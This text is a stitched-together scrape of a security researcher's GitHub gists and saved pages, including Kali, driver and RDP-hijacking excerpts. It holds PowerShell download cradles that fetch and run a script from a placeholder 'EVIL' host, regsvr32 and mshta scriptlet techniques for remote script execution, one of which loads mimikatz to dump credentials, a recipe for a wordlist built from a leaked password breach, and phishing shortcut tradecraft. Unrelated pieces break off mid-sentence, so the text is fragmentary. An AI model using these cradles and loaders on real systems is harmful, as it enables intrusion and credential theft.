Adam M Toscher W00t3k
@W00t3k
W00t3k / breachcompilation.txt
Created December 20, 2017 00:51
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@W00t3k
W00t3k / DownloadCradles.ps1
Created January 14, 2018 14:31 — forked from ConsciousHacker/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@W00t3k
W00t3k / Backdoor-Minimalist.sct
Created January 15, 2018 16:07 — forked from enigma0x3/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
@W00t3k
W00t3k / gist:398d80fa27950f555b8dd632c64c2992
Created January 16, 2018 12:54
D.UIJN.NL Shortcut Trick
D.UIJN.NL, December 28, 2016
Shortcuts: another neat phishing trick
Recently I read a blog about a Locky campaign using Windows shortcut files to infect users. The Microsoft blog describes a large-scale phishing attack sending Windows shortcut files in zip archives. For more information see the TechNet blog. The trick revolves around the fact that cmd.exe and powershell.exe both allow for commands passed via arguments. Creating a shortcut with the command parameters included will allow for PowerShell execution with a double click.
We do a lot of phishing attacks and for all the backdoor related stuff we rely heavily on Office macros using PowerShell, or one of the available script formats like .js/.wsf/.jse/.hta etc. The issue is that organisations are disabling macros via group policy and script files are being blocked via web/e-mail channels. If you haven't blocked the execution of macros via the command line, look at this.
The Locky campaign used a download an
Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W
The core version of the Re4son-Kernel is included in Kali Linux >= 2017.3.
On this site, I publish the latest version with these additional features:
Sticky Finger's Kali-Pi
Natively compiled
Includes kernel headers
Support for all common TFT screens
Ethernet gadget support
Latest Nexmon drivers with -m6 & -m7 support
ALFA WiFi USB Support MacOS 10.13 (High Sierra) Model List
**2017/12/5 Updated News: Here come AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH, AWUS036ACM, Tube-UN, UBDo-25, UBDo-n Mac OS X 10.13 driver. Download Driver: Mac 10.13**
**2017/11/28 Updated Note: AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH and AWUS036ACM ONLY work if you already installed them on Mac OS X 10.12 and then upgraded to Mac OS X 10.13. On a new (clean) Mac OS X 10.13 system they will not work.**
Note: MacOS 10.13 uses the same driver as MacOS 10.12, therefore please check the MacOS 10.12 driver page; here is the link: Mac OS X 10.12 driver link
Tips: If you don't see the Alfa Utility icon in the top right system tray, you can go to Applications, find the ALFA Wireless Utility folder and click the "ALFA Wireless Utility" icon to enable Alfa Utility
Posted 23rd October 2017 by ALFA NETWORK
Lots of ways to trigger HTA in iexplore.exe 😀
{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}
Try .mhtml for example. No mime type.
Kevin Beaumont
InfoSec, from the trenches of reality. Email kevin.beaumont@gmail.com | Twitter: @gossithedog
Mar 19, 2017
RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation
How you can very easily use Remote Desktop Services to gain lateral movement through a network, using no external software — and how to defend against it.
Alexander Korznikov demonstrates using Sticky Keys and tscon to access an administrator RDP session — without even logging into the server.
Brief background on RDP session connection
1. Update your Windows 10 machine. Open an administrative PowerShell window and install the Windows Subsystem for Linux with this one-liner. A reboot will be required once finished.
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
2. Once rebooted, open a command line shell and run the following commands to install the default Ubuntu environment. This will lay down the foundations for our Kali install.
lxrun /install
3. Set up and install the WSL Switcher, download a Kali base, and extract it to disk:
git clone https://github.com/RoliSoft/WSL-Distribution-Switcher.git
cd WSL-Distribution-Switcher
@W00t3k
W00t3k / mimikatz.sct
Created January 19, 2018 15:59
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>